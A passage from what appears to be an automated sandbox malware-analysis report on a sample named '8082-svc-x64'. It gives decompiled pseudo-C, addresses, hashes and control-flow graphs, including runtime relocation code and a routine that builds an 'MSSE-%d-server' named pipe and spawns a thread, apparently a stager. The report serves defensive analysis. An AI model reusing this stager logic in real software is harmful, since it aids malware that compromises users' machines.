          				intOrPtr _v84;
          				intOrPtr _v96;
          				char _v104;
          				char _v120;
          				intOrPtr _v132;
          				void* _v144;
          				char _v168;
          				char _v304;
          				intOrPtr _t72;
          				void* _t73;
          				long _t74;
          				long _t75;
          				int _t76;
          				char _t80;
          				long _t81;
          				intOrPtr _t87;
          				intOrPtr _t88;
          				int _t93;
          				signed int _t97;
          				signed int _t110;
          				void* _t111;
          				void* _t113;
          				long long _t115;
          				signed int* _t124;
          				signed long long _t129;
          				signed int _t130;
          				void* _t132;
          				signed char* _t140;
          				intOrPtr* _t143;
          				intOrPtr _t153;
          				intOrPtr _t162;
          				intOrPtr _t164;
          				intOrPtr _t172;
          				long long _t178;
          				signed int _t207;
          				long long _t212;
          
          				_t218 = __r13;
          				_t212 = __r12;
          				_t196 = __r8;
          				_t153 = __rdx;
          				_t72 = __eax;
          				_push(__r13);
          				_push(__r12);
          				_push(_t178);
          				_push(__rdi);
          				_push(__rsi);
          				_push(__rbx);
          				_t129 = __rcx;
          				_t164 = __rdx;
          				_t172 = __r8;
          				if(__r8 != 0) {
          					_t97 =  *0x44a360;
          					__eflags = _t97;
          					if(__eflags <= 0) {
          						goto L7;
          					} else {
          						_t116 =  *0x44a358;
          						_t113 = 0;
          						asm("o16 nop [eax+eax]");
          						do {
          							_t153 =  *((intOrPtr*)(_t116 + 8));
          							__eflags = _t129 - _t153;
          							if(_t129 < _t153) {
          								goto L6;
          							} else {
          								_t196 =  *((intOrPtr*)(_t116 + 0x10));
          								r8d =  *(_t196 + 8);
          								_t153 = _t153 + _t196;
          								__eflags = _t129 - _t153;
          								if(_t129 < _t153) {
          									L17:
          									_t178 = VirtualQuery;
          									L11:
          									r8d = 0x30;
          									_t154 =  &_v168;
          									_t75 = VirtualQuery(??, ??, ??);
          									__eflags = _t116;
          									if(_t116 == 0) {
          										L25:
          										_t140 = "  VirtualQuery failed for %d bytes at address %p";
          										_t198 = _t129;
          										_t76 = E00402270(_t75, _t129, _t140, _t154, _t164, _t172, _t198, _t207, _t212, _t218);
          										_push(_t178);
          										_push(_t212);
          										_push(_t164);
          										_push(_t172);
          										_push(_t129);
          										r12d =  *0x44a350;
          										__eflags = r12d;
          										if(__eflags == 0) {
          											 *0x44a350 = 1;
          											E004029A0(__eflags);
          											_t76 = E00403100(_t116);
          											_t130 = 0x447310;
          											 *0x44a360 = 0;
          											 *0x44a358 =  &_v304;
          											__eflags = 0x447310 - 7;
          											if(0x447310 <= 7) {
          												goto L27;
          											} else {
          												__eflags = 0 - 0xb;
          												if(0 <= 0xb) {
          													L43:
          													r9d =  *_t130;
          													__eflags = r9d;
          													if(r9d != 0) {
          														goto L32;
          													} else {
          														r8d =  *(_t130 + 4);
          														__eflags = r8d;
          														if(r8d != 0) {
          															goto L32;
          														} else {
          															goto L45;
          														}
          													}
          												} else {
          													_t110 =  *0x447310; // 0x0
          													__eflags = _t110;
          													if(_t110 != 0) {
          														L32:
          														__eflags = _t130 - 0x447310;
          														if(_t130 >= 0x447310) {
          															goto L27;
          														} else {
          															do {
          																r8d = 4;
          																_t140 =  &(_t140[0x400000]);
          																_t80 =  *_t140 +  *_t130;
          																_t130 = _t130 + 8;
          																_v44 = _t80;
          																_t76 = E004022E0(_t80, _t130, _t140,  &_v44, 0x400000, 0x447310, _t198, _t212, _t218);
          																__eflags = _t130 - 0x447310;
          															} while (_t130 < 0x447310);
          															goto L35;
          														}
          													} else {
          														r11d =  *0x447314; // 0x0
          														__eflags = r11d;
          														if(r11d == 0) {
          															r10d =  *0x447318; // 0x0
          															__eflags = r10d;
          															if(r10d != 0) {
          																L45:
          																__eflags =  *(_t130 + 8) - 1;
          																if( *(_t130 + 8) != 1) {
          																	L74:
          																	_t143 = "  Unknown pseudo relocation protocol version %d.\n";
          																	E00402270(_t76, _t130, _t143, _t154, _t164, 0x447310, _t198, _t207, _t212, _t218);
          																	0;
          																	0;
          																	__eflags =  *_t143 - 0x5a4d;
          																	if( *_t143 != 0x5a4d) {
          																		L76:
          																		asm("repe ret");
          																	}
          																	_t143 = _t143 +  *((intOrPtr*)(_t143 + 0x3c));
          																	__eflags =  *_t143 - 0x4550;
          																	if( *_t143 != 0x4550) {
          																		goto L76;
          																	}
          																	__eflags =  *((short*)(_t143 + 0x18)) - 0x20b;
          																	_t71 =  *((short*)(_t143 + 0x18)) == 0x20b;
          																	__eflags = _t71;
          																	return 0 | _t71;
          																} else {
          																	_t132 = _t130 + 0xc;
          																	__eflags = _t132 - 0x447310;
          																	if(_t132 < 0x447310) {
          																		do {
          																			r8d =  *(_t132 + 8);
          																			_t76 = r8b & 0xffffffff;
          																			_t154 = _t154 + 0x400000;
          																			_t140 =  &(_t140[0x400000]);
          																			__eflags = _t76 - 0x10;
          																			_t207 =  *_t154;
          																			if(__eflags == 0) {
          																				r8d =  *_t140 & 0x0000ffff;
          																				__eflags = r8d & 0x00008000;
          																				if((r8d & 0x00008000) == 0) {
          																					goto L61;
          																				} else {
          																					_t198 = (_t198 | 0xffff0000) - _t154 + _t207;
          																					__eflags = _t198;
          																					_v56 = _t198;
          																					goto L60;
          																				}
          																			} else {
          																				if(__eflags > 0) {
          																					L52:
          																					__eflags = _t76 - 0x20;
          																					if(_t76 == 0x20) {
          																						r8d =  *_t140;
          																						__eflags = r8d & 0x80000000;
          																						if((r8d & 0x80000000) == 0) {
          																							goto L61;
          																						} else {
          																							_t198 = (_t198 | 0x00000000) - _t154 + _t207;
          																							__eflags = _t198;
          																							_v56 = _t198;
          																							goto L67;
          																						}
          																					} else {
          																						__eflags = _t76 - 0x40;
          																						if(_t76 != 0x40) {
          																							goto L51;
          																						} else {
          																							_t207 = _t207 - _t154 +  *_t140;
          																							__eflags = _t207;
          																							_v56 = _t207;
          																							goto L55;
          																						}
          																					}
          																				} else {
          																					__eflags = _t76 - 8;
          																					if(_t76 == 8) {
          																						r8d =  *_t140 & 0x000000ff;
          																						__eflags = r8b & 0x00000080;
          																						if((r8b & 0x00000080) == 0) {
          																							L61:
          																							_t198 = _t198 - _t154;
          																							_t207 = _t207 + _t198;
          																							__eflags = _t76 - 0x10;
          																							_v56 = _t207;
          																							if(__eflags == 0) {
          																								L60:
          																								_t154 =  &_v56;
          																								r8d = 2;
          																								_t76 = E004022E0(_t76, _t132, _t140, _t154, 0x400000, 0x447310, _t198, 0, _t218);
          																							} else {
          																								if(__eflags > 0) {
          																									__eflags = _t76 - 0x20;
          																									if(_t76 == 0x20) {
          																										L67:
          																										_t154 =  &_v56;
          																										r8d = 4;
          																										_t76 = E004022E0(_t76, _t132, _t140, _t154, 0x400000, 0x447310, _t198, 0, _t218);
          																									} else {
          																										__eflags = _t76 - 0x40;
          																										if(_t76 == 0x40) {
          																											L55:
          																											_t154 =  &_v56;
          																											r8d = 8;
          																											_t76 = E004022E0(_t76, _t132, _t140, _t154, 0x400000, 0x447310, _t198, 0, _t218);
          																										}
          																									}
          																								} else {
          																									__eflags = _t76 - 8;
          																									if(_t76 == 8) {
          																										goto L64;
          																									}
          																								}
          																							}
          																						} else {
          																							_t198 = (_t198 | 0xffffff00) - _t154 + _t207;
          																							_v56 = _t198;
          																							L64:
          																							_t154 =  &_v56;
          																							r8d = 1;
          																							_t76 = E004022E0(_t76, _t132, _t140, _t154, 0x400000, 0x447310, _t198, 0, _t218);
          																						}
          																					} else {
          																						L51:
          																						_t140 = "  Unknown pseudo relocation bit size %d.\n";
          																						_v56 = 0;
          																						_t76 = E00402270(_t76, _t132, _t140, _t154, 0x400000, 0x447310, _t198, _t207, 0, _t218);
          																						goto L52;
          																					}
          																				}
          																			}
          																			_t132 = _t132 + 0xc;
          																			__eflags = _t132 - 0x447310;
          																		} while (_t132 < 0x447310);
          																		L35:
          																		__eflags =  *0x44a360;
          																		if( *0x44a360 > 0) {
          																			_t111 = 0;
          																			_t212 = VirtualQuery;
          																			_t164 = VirtualProtect;
          																			do {
          																				_t124 = _t130 +  *0x44a358;
          																				__eflags =  *_t124;
          																				if( *_t124 == 0) {
          																					goto L37;
          																				} else {
          																					r8d = 0x30;
          																					_t154 =  &_v104;
          																					_t81 = VirtualQuery(??, ??, ??);
          																					__eflags = _t124;
          																					if(_t124 == 0) {
          																						_t130 = _t130 +  *0x44a358;
          																						__eflags = _t130;
          																						_t198 =  *(_t130 + 8);
          																						_t76 = E00402270(_t81, _t130, "  VirtualQuery failed for %d bytes at address %p",  &_v104, _t164, 0x447310,  *(_t130 + 8), _t207, _t212, _t218);
          																						goto L74;
          																					} else {
          																						_t207 =  &_v44;
          																						r8d =  *( *0x44a358 + _t130);
          																						_t76 = VirtualProtect(??, ??, ??, ??);
          																						goto L37;
          																					}
          																				}
          																				goto L80;
          																				L37:
          																				_t111 = _t111 + 1;
          																				_t130 = _t130 + 0x18;
          																				__eflags = _t111 -  *0x44a360;
          																			} while (_t111 <  *0x44a360);
          																		}
          																	}
          																	goto L27;
          																}
          															} else {
          																_t130 = 0x44731c;
          																goto L43;
          															}
          														} else {
          															goto L32;
          														}
          													}
          												}
          											}
          										} else {
          											L27:
          											return _t76;
          										}
          									} else {
          										_t88 = _v132;
          										__eflags = _t88 - 4;
          										if(_t88 == 4) {
          											L13:
          											return memcpy();
          										}
          										__eflags = _t88 - 0x40;
          										if(_t88 == 0x40) {
          											goto L13;
          										}
          										r8d = 0x40;
          										VirtualProtect(??, ??, ??, ??);
          										memcpy(??, ??, ??);
          										_t72 = _v132;
          										__eflags = _t72 - 0x40;
          										if(_t72 == 0x40) {
          											goto L1;
          										} else {
          											__eflags = _t72 - 4;
          											if(_t72 == 4) {
          												goto L1;
          											} else {
          												r8d = _v60;
          												return VirtualProtect(??, ??, ??, ??);
          											}
          										}
          									}
          								} else {
          									goto L6;
          								}
          							}
          							goto L80;
          							L6:
          							_t113 = _t113 + 1;
          							_t116 = _t116 + 0x18;
          							__eflags = _t113 - _t97;
          						} while (__eflags != 0);
          						L7:
          						_t73 = E00402960(__eflags, _t129, _t164, _t172, _t196, _t207);
          						__eflags = _t115;
          						_t212 = _t115;
          						if(__eflags == 0) {
          							_t154 = _t129;
          							_t74 = E00402270(_t73, _t129, "Address %p has no image-section", _t154, _t164, _t172, _t196, _t207, _t212, _t218);
          							goto L24;
          						} else {
          							_t218 = 0 << 3;
          							_a16 = _t115;
          							 *((0 << 3) +  *0x44a358) = 0;
          							E00402A50(__eflags, _t153);
          							r8d = 0x30;
          							_t154 =  &_v120;
          							_a8 = _t115 + _t153;
          							_t116 =  *0x44a358;
          							_t178 = VirtualQuery;
          							_t74 = VirtualQuery(??, ??, ??);
          							__eflags = _t116;
          							if(_t116 == 0) {
          								L24:
          								_t116 =  *0x44a358;
          								_t75 = E00402270(_t74, _t129, "  VirtualQuery failed for %d bytes at address %p", _t154, _t164, _t172,  *((intOrPtr*)( *0x44a358 + _t218 + 8)), _t207, _t212, _t218);
          								goto L25;
          							} else {
          								_t87 = _v84;
          								__eflags = _t87 - 4;
          								if(_t87 != 4) {
          									__eflags = _t87 - 0x40;
          									if(_t87 == 0x40) {
          										goto L10;
          									} else {
          										r8d = 0x40;
          										_t162 = _v96;
          										_t207 =  *0x44a358 + (0 << 3);
          										_t93 = VirtualProtect(??, ??, ??, ??);
          										__eflags = _t93;
          										if(_t93 != 0) {
          											goto L10;
          										} else {
          											E00402270(GetLastError(), _t129, "  VirtualProtect failed with code 0x%x", _t162, _t164, _t172, _t196, _t207, _t212, 0 << 3);
          											goto L17;
          										}
          									}
          								} else {
          									L10:
          									 *0x44a360 =  *0x44a360 + 1;
          									__eflags =  *0x44a360;
          								}
          								goto L11;
          							}
          						}
          					}
          				} else {
          					L1:
          					return _t72;
          				}
          				L80:
          			}












































          0x004022e0
          0x004022e0
          0x004022e0
          0x004022e0
          0x004022e0
          0x004022e0
          0x004022e2
          0x004022e4
          0x004022e5
          0x004022e6
          0x004022e7
          0x004022f2
          0x004022f5
          0x004022f8
          0x004022fb
          0x00402310
          0x00402316
          0x00402318
          0x00000000
          0x0040231e
          0x0040231e
          0x00402325
          0x00402327
          0x00402330
          0x00402330
          0x00402334
          0x00402337
          0x00000000
          0x00402339
          0x00402339
          0x0040233d
          0x00402341
          0x00402344
          0x00402347
          0x00402460
          0x00402460
          0x004023d7
          0x004023d7
          0x004023dd
          0x004023e5
          0x004023e7
          0x004023ea
          0x0040251a
          0x0040251a
          0x00402521
          0x00402529
          0x00402530
          0x00402534
          0x00402536
          0x00402537
          0x00402538
          0x0040253d
          0x00402544
          0x00402547
          0x00402554
          0x0040255e
          0x00402575
          0x00402581
          0x00402588
          0x0040259a
          0x004025a7
          0x004025ab
          0x00000000
          0x004025ad
          0x004025ad
          0x004025b1
          0x004026a0
          0x004026a0
          0x004026a3
          0x004026a6
          0x00000000
          0x004026ac
          0x004026ac
          0x004026b0
          0x004026b3
          0x00000000
          0x00000000
          0x00000000
          0x00000000
          0x004026b3
          0x004025b7
          0x004025b7
          0x004025bd
          0x004025bf
          0x004025d1
          0x004025d1
          0x004025d4
          0x00000000
          0x004025da
          0x004025e1
          0x004025e8
          0x004025ee
          0x004025f3
          0x004025f5
          0x004025f9
          0x004025fc
          0x00402601
          0x00402601
          0x00000000
          0x004025e1
          0x004025c1
          0x004025c1
          0x004025c8
          0x004025cb
          0x00402688
          0x0040268f
          0x00402692
          0x004026b9
          0x004026bc
          0x004026bf
          0x00402827
          0x00402827
          0x0040282e
          0x00402839
          0x0040283d
          0x00402842
          0x00402847
          0x00402849
          0x00402849
          0x00402849
          0x00402854
          0x00402857
          0x0040285d
          0x00000000
          0x00000000
          0x00402861
          0x00402867
          0x00402867
          0x0040286a
          0x004026c5
          0x004026c5
          0x004026c9
          0x004026cc
          0x004026e3
          0x004026e8
          0x004026ec
          0x004026f0
          0x004026f3
          0x004026f6
          0x004026f9
          0x004026fc
          0x00402756
          0x0040275a
          0x00402761
          0x00000000
          0x00402763
          0x0040276d
          0x0040276d
          0x00402770
          0x00000000
          0x00402770
          0x004026fe
          0x004026fe
          0x00402721
          0x00402721
          0x00402724
          0x004027ac
          0x004027af
          0x004027b6
          0x00000000
          0x004027b8
          0x004027be
          0x004027be
          0x004027c1
          0x00000000
          0x004027c1
          0x0040272a
          0x0040272a
          0x0040272d
          0x00000000
          0x0040272f
          0x00402732
          0x00402732
          0x00402735
          0x00000000
          0x00402735
          0x0040272d
          0x00402700
          0x00402700
          0x00402703
          0x004027d9
          0x004027dd
          0x004027e1
          0x00402785
          0x00402785
          0x00402788
          0x0040278b
          0x0040278e
          0x00402792
          0x00402774
          0x00402774
          0x00402778
          0x0040277e
          0x00402794
          0x00402794
          0x004027f6
          0x004027f9
          0x004027c5
          0x004027c5
          0x004027c9
          0x004027cf
          0x004027fb
          0x004027fb
          0x004027fe
          0x00402739
          0x00402739
          0x0040273d
          0x00402743
          0x00402743
          0x004027fe
          0x00402796
          0x00402796
          0x00402799
          0x00000000
          0x00000000
          0x00402799
          0x00402794
          0x004027e3
          0x004027ed
          0x004027f0
          0x0040279b
          0x0040279b
          0x0040279f
          0x004027a5
          0x004027a5
          0x00402709
          0x00402709
          0x00402709
          0x00402714
          0x0040271c
          0x00000000
          0x0040271c
          0x00402703
          0x004026fe
          0x00402748
          0x0040274c
          0x0040274c
          0x00402606
          0x0040260c
          0x0040260e
          0x00402616
          0x00402618
          0x0040261f
          0x00402643
          0x00402646
          0x0040264f
          0x00402651
          0x00000000
          0x00402653
          0x00402657
          0x0040265d
          0x00402661
          0x00402664
          0x00402667
          0x00402809
          0x00402809
          0x0040281b
          0x00402822
          0x00000000
          0x0040266d
          0x00402674
          0x00402680
          0x00402684
          0x00000000
          0x00402684
          0x00402667
          0x00000000
          0x00402630
          0x00402630
          0x00402633
          0x00402637
          0x00402637
          0x00402643
          0x0040260e
          0x00000000
          0x004026cc
          0x00402694
          0x00402694
          0x00000000
          0x00402694
          0x00000000
          0x00000000
          0x00000000
          0x004025cb
          0x004025bf
          0x004025b1
          0x00402549
          0x00402549
          0x00402553
          0x00402553
          0x004023f0
          0x004023f0
          0x004023f4
          0x004023f7
          0x004023f9
          0x00403158
          0x00403158
          0x00402470
          0x00402473
          0x00000000
          0x00000000
          0x0040247d
          0x00402494
          0x0040249f
          0x004024a4
          0x004024a8
          0x004024ab
          0x00000000
          0x004024b1
          0x004024b1
          0x004024b4
          0x00000000
          0x004024ba
          0x004024ba
          0x004024e6
          0x004024e6
          0x004024b4
          0x004024ab
          0x00000000
          0x00000000
          0x00000000
          0x00402347
          0x00000000
          0x0040234d
          0x0040234d
          0x00402350
          0x00402354
          0x00402354
          0x00402358
          0x0040235b
          0x00402360
          0x00402363
          0x00402366
          0x004024f5
          0x004024f8
          0x00000000
          0x0040236c
          0x00402374
          0x00402382
          0x00402386
          0x0040238d
          0x00402397
          0x004023a0
          0x004023a5
          0x004023a9
          0x004023b0
          0x004023bc
          0x004023be
          0x004023c1
          0x004024fd
          0x004024fd
          0x00402515
          0x00000000
          0x004023c7
          0x004023c7
          0x004023cb
          0x004023ce
          0x00402420
          0x00402423
          0x00000000
          0x00402425
          0x0040242c
          0x00402432
          0x0040243c
          0x0040243f
          0x00402445
          0x00402447
          0x00000000
          0x00402449
          0x00402458
          0x00000000
          0x00402458
          0x00402447
          0x004023d0
          0x004023d0
          0x004023d0
          0x004023d0
          0x004023d0
          0x00000000
          0x004023ce
          0x004023c1
          0x00402366
          0x004022fd
          0x004022fd
          0x0040230c
          0x0040230c
          0x00000000

          APIs
          • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004023BC
          • VirtualQuery.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 004023E5
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: QueryVirtual
          • String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section
          • API String ID: 1804819252-2123141913
          • Opcode ID: 0792c8dda6669a92304e0101e404c0d24dcaeabf32f89e8b15c871c3c5c22671
          • Instruction ID: 88fc682119e1e84dd5613be26e00d6309895d6327acac6be1cb9a5017a00939a
          • Opcode Fuzzy Hash: 0792c8dda6669a92304e0101e404c0d24dcaeabf32f89e8b15c871c3c5c22671
          • Instruction Fuzzy Hash: 6B51BEA230568485EB219F56E908BAA6721F785BD8F488037EF0957794EB7CC989C708
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 173 401955-4019ea GetTickCount call 403198 CreateThread
          C-Code - Quality: 48%
          			E00401955(void* __edi, void* __esi, void* __esp, void* __rax) {
          				signed int _v16;
          				intOrPtr _v24;
          				intOrPtr _v32;
          				intOrPtr _v40;
          				intOrPtr _v48;
          				intOrPtr _v56;
          				long long _v64;
          				intOrPtr _v72;
          				signed int _t16;
          				intOrPtr _t30;
          				intOrPtr _t31;
          				int _t38;
          
          				_t16 = GetTickCount();
          				r9d = 0x5c;
          				r8d = 0x5c;
          				_v24 = 0x5c;
          				_v32 = 0x65;
          				_v40 = 0x70;
          				_v48 = 0x69;
          				_v56 = 0x70;
          				_v64 = 0x5c;
          				_v72 = 0x2e;
          				_v16 = _t16 % 0x26aa;
          				L00403198();
          				_v64 = 0;
          				_v72 = 0;
          				r9d = 0;
          				CreateThread(??, ??, ??, ??, ??, ??);
          				malloc(_t38);
          				do {
          					Sleep();
          					_t30 =  *0x404004; // 0x40e03
          				} while (E00401862(_t30, __rax, __rax) == 0);
          				_t31 =  *0x404004; // 0x40e03
          				E0040174A(_t31, __edi, __esi, __esp, __rax, __rax);
          				return 0;
          			}















          0x00401959
          0x00401966
          0x00401975
          0x0040197b
          0x00401983
          0x0040198b
          0x00401993
          0x0040199b
          0x004019a3
          0x004019ab
          0x004019b3
          0x004019be
          0x004019cc
          0x004019d5
          0x004019dd
          0x004019e2
          0x0040190f
          0x0040191e
          0x00401923
          0x00401925
          0x00401933
          0x00401937
          0x00401947
          0x00401954

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: CountCreateThreadTick
          • String ID: %c%c%c%c%c%c%c%c%cMSSE-%d-server$.$\$\$e$i$p$p
          • API String ID: 515558314-592031345
          • Opcode ID: e05ad072f323f72a2a79cc493ff35362bbae31336054ceb108d5cffb157eca38
          • Instruction ID: bd8c15904f82b4196aa4fa4413ddfb1ff446bd0bae90e3a6362402e970df292a
          • Opcode Fuzzy Hash: e05ad072f323f72a2a79cc493ff35362bbae31336054ceb108d5cffb157eca38
          • Instruction Fuzzy Hash: 350131B1608B40CBF3248F11F85974B7BA1F3C4759F50421AE74A06AA8CBBEC149CF48
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 176 401f20-401f3c 177 401fd0-401fd4 176->177 178 401f42-401f47 176->178 177->178 181 401fda 177->181 179 401f90-401f95 178->179 180 401f49-401f4e 178->180 185 401ff0-401ff5 179->185 186 401f97 179->186 182 401f54 180->182 183 402085-402087 180->183 184 401fe0-401feb 181->184 188 402041-402046 182->188 189 401f5a-401f5f 182->189 187 401f9c-401fac signal 183->187 185->184 190 401ff7 185->190 186->187 191 4020c0-4020d6 signal 187->191 192 401fb2-401fb5 187->192 188->184 193 402048-40204d 188->193 189->184 194 401f61-401f66 189->194 195 402090-402095 190->195 196 401ffd-402002 190->196 203 401fc3-401fc9 191->203 204 4020dc-4020e9 call 402c30 191->204 197 401f70-401f7a 192->197 198 401fb7-401fbe 192->198 193->197 199 402053-402063 signal 193->199 194->186 200 401f68 194->200 195->199 201 402097-40209c 195->201 196->184 202 402004-402009 196->202 208 4020b0-4020b2 197->208 209 401f80-401f88 197->209 198->203 206 402110-40211f signal 199->206 207 402069-40206c 199->207 200->197 201->197 210 4020a2 201->210 202->197 211 40200f-40201f signal 202->211 204->203 207->197 214 402072-402084 207->214 208->203 209->179 210->184 215 4020f0-402104 signal 211->215 216 402025-402028 211->216 215->203 216->197 217 40202e-402040 216->217
          C-Code - Quality: 61%
          			E00401F20(intOrPtr* __rcx) {
          				intOrPtr _v32;
          				signed int _t6;
          				signed int _t37;
          				void* _t40;
          				signed int* _t51;
          				void* _t53;
          
          				_t51 =  *((intOrPtr*)(__rcx));
          				_t6 =  *_t51;
          				if((_t6 & 0x20ffffff) == 0x20474343) {
          					__eflags = _t51[1] & 0x00000001;
          					if((_t51[1] & 0x00000001) != 0) {
          						goto L1;
          					} else {
          						asm("o16 nop [eax+eax]");
          						goto L17;
          					}
          				} else {
          					L1:
          					if(_t6 <= 0xc0000091) {
          						if(_t6 < 0xc000008d) {
          							__eflags = _t6 - 0xc0000008;
          							if(__eflags == 0) {
          								goto L17;
          							} else {
          								if(__eflags > 0) {
          									__eflags = _t6 - 0xc000001d;
          									if(_t6 == 0xc000001d) {
          										goto L27;
          									} else {
          										__eflags = _t6 - 0xc000008c;
          										if(_t6 != 0xc000008c) {
          											goto L7;
          										}
          										goto L17;
          									}
          								} else {
          									__eflags = _t6 - 0x80000002;
          									if(_t6 == 0x80000002) {
          										goto L17;
          									} else {
          										__eflags = _t6 - 0xc0000005;
          										if(_t6 != 0xc0000005) {
          											goto L7;
          										}
          										L004031C8();
          										__eflags = _t47 - 1;
          										if(_t47 == 1) {
          											L004031C8();
          											return 0xffffffff;
          										}
          										__eflags = _t47;
          										if(_t47 == 0) {
          											goto L7;
          										}
          										 *_t47();
          										return 0xffffffff;
          									}
          								}
          							}
          						} else {
          							goto L10;
          						}
          					} else {
          						_t40 = _t6 - 0xc0000094;
          						if(_t40 == 0) {
          							_t37 = 0;
          							goto L11;
          						} else {
          							if(_t40 > 0) {
          								__eflags = _t6 - 0xc0000095;
          								if(_t6 == 0xc0000095) {
          									goto L17;
          								} else {
          									__eflags = _t6 - 0xc0000096;
          									if(_t6 != 0xc0000096) {
          										goto L7;
          									}
          									L27:
          									L004031C8();
          									__eflags = _t47 - 1;
          									if(_t47 == 1) {
          										L004031C8();
          										return 0xffffffff;
          									}
          									__eflags = _t47;
          									if(_t47 == 0) {
          										goto L7;
          									}
          									 *_t47();
          									return 0xffffffff;
          								}
          							} else {
          								if(_t6 == 0xc0000092) {
          									L17:
          									return 0xffffffff;
          								} else {
          									if(_t6 != 0xc0000093) {
          										L7:
          										_t47 =  *0x44a0a0;
          										if( *0x44a0a0 == 0) {
          											return 0;
          										}
          										_t53 = _t53 + 0x38;
          										goto __rax;
          									}
          									L10:
          									_t37 = 1;
          									L11:
          									L004031C8();
          									if(_t47 != 1) {
          										if(_t47 == 0) {
          											goto L7;
          										}
          										 *_t47();
          										return 0xffffffff;
          									}
          									L004031C8();
          									__eflags = _t37;
          									if(_t37 != 0) {
          										_v32 = 0xffffffff;
          										E00402C30(0xffffffff);
          										return _v32;
          									}
          									return 0xffffffff;
          								}
          							}
          						}
          					}
          				}
          			}









          0x00401f26
          0x00401f2c
          0x00401f3c
          0x00401fd0
          0x00401fd4
          0x00000000
          0x00401fda
          0x00401fda
          0x00000000
          0x00401fda
          0x00401f42
          0x00401f42
          0x00401f47
          0x00401f95
          0x00401ff0
          0x00401ff5
          0x00000000
          0x00401ff7
          0x00401ff7
          0x00402090
          0x00402095
          0x00000000
          0x00402097
          0x00402097
          0x0040209c
          0x00000000
          0x00000000
          0x00000000
          0x004020a2
          0x00401ffd
          0x00401ffd
          0x00402002
          0x00000000
          0x00402004
          0x00402004
          0x00402009
          0x00000000
          0x00000000
          0x00402016
          0x0040201b
          0x0040201f
          0x004020fa
          0x00000000
          0x004020ff
          0x00402025
          0x00402028
          0x00000000
          0x00000000
          0x00402033
          0x00402040
          0x00402040
          0x00402002
          0x00401ff7
          0x00000000
          0x00000000
          0x00000000
          0x00401f49
          0x00401f49
          0x00401f4e
          0x00402085
          0x00000000
          0x00401f54
          0x00401f54
          0x00402041
          0x00402046
          0x00000000
          0x00402048
          0x00402048
          0x0040204d
          0x00000000
          0x00000000
          0x00402053
          0x0040205a
          0x0040205f
          0x00402063
          0x0040211a
          0x00000000
          0x0040211f
          0x00402069
          0x0040206c
          0x00000000
          0x00000000
          0x00402077
          0x00402084
          0x00402084
          0x00401f5a
          0x00401f5f
          0x00401fe0
          0x00401feb
          0x00401f61
          0x00401f66
          0x00401f70
          0x00401f70
          0x00401f7a
          0x00000000
          0x004020b0
          0x00401f83
          0x00401f89
          0x00401f89
          0x00401f97
          0x00401f97
          0x00401f9c
          0x00401fa3
          0x00401fac
          0x00401fb5
          0x00000000
          0x00000000
          0x00401fbc
          0x00000000
          0x00401fbe
          0x004020ca
          0x004020cf
          0x004020d6
          0x004020dc
          0x004020e0
          0x00000000
          0x004020e5
          0x00401fc9
          0x00401fc9
          0x00401f5f
          0x00401f54
          0x00401f4e
          0x00401f47

          APIs
          Strings
          Memory Dump Source
          • Source File: 00000000.00000002.306397768.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
          • Associated: 00000000.00000002.306389065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306405463.0000000000404000.00000008.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306465026.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
          • Associated: 00000000.00000002.306475955.000000000044B000.00000004.00000001.01000000.00000003.sdmpDownload File
          Joe Sandbox IDA Plugin
          • Snapshot File: hcaresult_0_2_400000_8082-svc-x64.jbxd
          Similarity
          • API ID: signal
          • String ID: CCG
          • API String ID: 1946981877-1584390748
          • Opcode ID: bd94bdd654f52c4ed5147b46818f35080280a777b2882d2b05581189ab25bde7
          • Instruction ID: 8e7c3a05cc17fdf1b5badb01421512bcab6a528367bbf551d61aa2c38f8b0cfc
          • Opcode Fuzzy Hash: bd94bdd654f52c4ed5147b46818f35080280a777b2882d2b05581189ab25bde7
          • Instruction Fuzzy Hash: CB31E632B1450206EA292278995477A11415B8E3B8F2D8737EE29E73F5CF7CCCC1920A
          Uniqueness

          Uniqueness Score: -1.00%

          Control-flow Graph

          • Executed
          • Not Executed
          control_flow_graph 220 401628-401642 221 401644-401648 220->221 222 40164a-401650 GetCurrentProcess 220->222 221->222 223 401655-401703 GetEnvironmentVariableA _snprintf CreateProcessA 221->223 224 40170d-401710 222->224 225 401705 223->225 226 40173a-401749 223->226 224->226 227 401712-401739 call 401588 224->227 225->224 227->226
          C-Code - Quality: 39%
          			E00401628(void* __edx, void* __edi, void* __esi, void* __esp, intOrPtr __rax, void* __rcx, long long __r8) {
          				char _v80;
          				intOrPtr _v104;
